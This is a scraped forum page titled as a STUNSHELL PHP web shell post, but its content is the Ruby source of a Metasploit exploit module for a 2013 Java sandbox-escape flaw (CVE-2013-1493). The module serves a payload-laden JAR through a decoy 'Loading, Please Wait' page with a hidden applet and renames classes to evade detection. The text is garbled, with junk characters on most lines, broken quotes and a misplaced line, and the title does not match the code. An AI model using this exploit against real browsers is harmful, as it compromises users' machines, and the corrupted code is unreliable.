STUNSHELL PHP Web Shell远程执行代码

admin

##

# t4 R6 d0 Q, D# This file is part of the Metasploit Framework and may be subject to
) [0 _" o1 h4 z( p+ Y- @7 g# redistribution and commercial restrictions. Please see the Metasploit
( D( m1 a+ ?) R9 Q# web site for more information on licensing and terms of use.
/ I& R4 W5 b& P3 z- u" Y. ?# http://metasploit.com/
1 u1 T0 Z* B. S; H) T) p7 N##
: {) [- @) [4 d; Vrequire ‘msf/core’
require ‘rex’
class Metasploit3 < Msf::Exploit::Remote
' I3 b6 H% [; g1 d/ o" {  q2 G) Q; v+ SRank = NormalRanking
* G6 ]+ u( ]: Hinclude Msf::Exploit::Remote::HttpServer::HTML
" S- c6 O9 ?9 O& g3 g7 cinclude Msf::Exploit::EXE
7 w2 R, o2 H3 P6 e6 Uinclude Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({ :javascript => false })
8 w  t2 D8 H3 N3 U4 D1 qdef initialize( info = {} )
! z8 c: U8 Q0 j) Tsuper( update_info( info,
‘Name’ => ‘Java CMM Remote Code Execution’,
6 o4 B% d8 t/ y: n‘Description’ => %q{
This module abuses the Color Management classes from a Java Applet to run
" o% a6 Q( q4 Varbitrary Java code outside of the sandbox as exploited in the wild in February
; X  k3 L1 U: _+ K8 xand March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
: U6 c5 H! W2 ?) ]9 I6 N# E# Qsystems. This exploit doesn’t bypass click-to-play, so the user must accept the java
5 w* V2 C! t. q- p! K  m4 ?warning in order to run the malicious applet.
% ^6 c# J: S0 n},
7 U* ^0 t. a' O2 i) B‘License’ => MSF_LICENSE,
' b) u0 z/ y9 M( K‘Author’ =>
'Unknown', # Vulnerability discovery and Exploit
9 [% V& `/ ]" o1 @9 g$ u'juan vazquez' # Metasploit module (just ported the published exploit)
3 r- S* a" ?, f$ x* M3 B],
5 E, k# a+ m& m: b1 V‘References’ =>
[
[ 'CVE', '2013-1493' ],
% `) f- J! m5 p% Q$ Z[ 'OSVDB', '90737' ],
[ 'BID', '58238' ],
[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
1 k" X) l+ R# _, n6 }[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
2 t. K9 T; q$ I: m& I3 u[ 'URL', 'http://pastie.org/pastes/6581034' ]
],
/ G: A( g& ]  _, X‘Platform’ => [ 'win', 'java' ],
' q* u- Y# p1 r: m‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },
‘Targets’ =>
[
[ 'Generic (Java Payload)',
4 ?- x" N* Z( c4 g/ m6 E, O{
' E; E! U: k) U; [5 }'Platform' => 'java',
'Arch' => ARCH_JAVA
9 O$ L, P4 Q% j: j$ W}
],
$ ?, a. M+ H7 f: \: p5 c+ M[ 'Windows x86 (Native Payload)',
5 C+ V( M9 a7 F$ i: V& o{
'Platform' => 'win',
) w, q+ a) X9 Y2 u) u3 v% K/ ['Arch' => ARCH_X86
}
]
) o# ]* ~( C- T8 w],
( _- n! A, J: J& u' o5 p6 j# y‘‘DisclosureDate’ => ‘Mar 01 2013′
))
end
def setup
, B" x/ l' {8 G  |path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)
@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)
@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
$ w, y) i' d/ Q# P7 tpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)
@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
, R# L- t' d4 k0 @+ T. z, Ppath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)
! V( c% Q4 h* m6 L% m2 l@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
@init_class_name = rand_text_alpha(“Init”.length)
8 p3 S! y$ q, \@init_class.gsub!(“Init”, @init_class_name)
' c& O- e! d  F' ~6 i% Y& Vsuper
end
def on_request_uri(cli, request)
$ c7 R0 S5 Y1 U, J" O) T9 nprint_status(“handling request for #{request.uri}”)
case request.uri
when /\.jar$/i
jar = payload.encoded_jar
jar.add_file(“#{@init_class_name}.class”, @init_class)
jar.add_file(“Leak.class”, @leak_class)
; I* L3 k! ~, djar.add_file(“MyBufferedImage.class”, @buffered_image_class)
+ M3 B* u" ~$ n9 `: f; f  ~jar.add_file(“MyColorSpace.class”, @color_space_class)
DefaultTarget’ => 1,
metasploit_str = rand_text_alpha(“metasploit”.length)
0 e0 D' ]) E! a" \. E9 C* ]payload_str = rand_text_alpha(“payload”.length)
jar.entries.each { |entry|
$ V+ P* M) x: gentry.name.gsub!(“metasploit”, metasploit_str)
entry.name.gsub!(“Payload”, payload_str)
entry.data = entry.data.gsub(“metasploit”, metasploit_str)
entry.data = entry.data.gsub(“Payload”, payload_str)
; i, I7 X( g0 L2 [8 j}
jar.build_manifest
; h* {, X) W/ o# d+ g, lsend_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })
( _! h7 j: y, i0 h! Mwhen /\/$/
payload = regenerate_payload(cli)
2 f: C; u3 p, b7 c# yif not payload
print_error(“Failed to generate the payload.”)
# s, ]) N4 ]8 ^9 N5 o: E% ]! W( }send_not_found(cli)
" [& p1 e6 [- {" L' v) `( y# c* `) Oreturn
- M3 b7 M0 K& ?% eend
send_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })
& m# B; b& D7 F; A" i2 {else
send_redirect(cli, get_resource() + ‘/’, ”)
end
end
9 h2 h( a( k  Adef generate_html
, D8 {- R" ]+ U1 xhtml = %Q|<html><head><title>Loading, Please Wait…</title></head>|
html += %Q|<body><center><p>Loading, Please Wait…</p></center>|
html += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|
/ @0 p* ?7 [. ~( ~html += %Q|</applet></body></html>|
return html
end
end
5 I5 J7 d' \- Y% D- G9 Q0 Send
/ {: E! k. f" ^% s0 o. K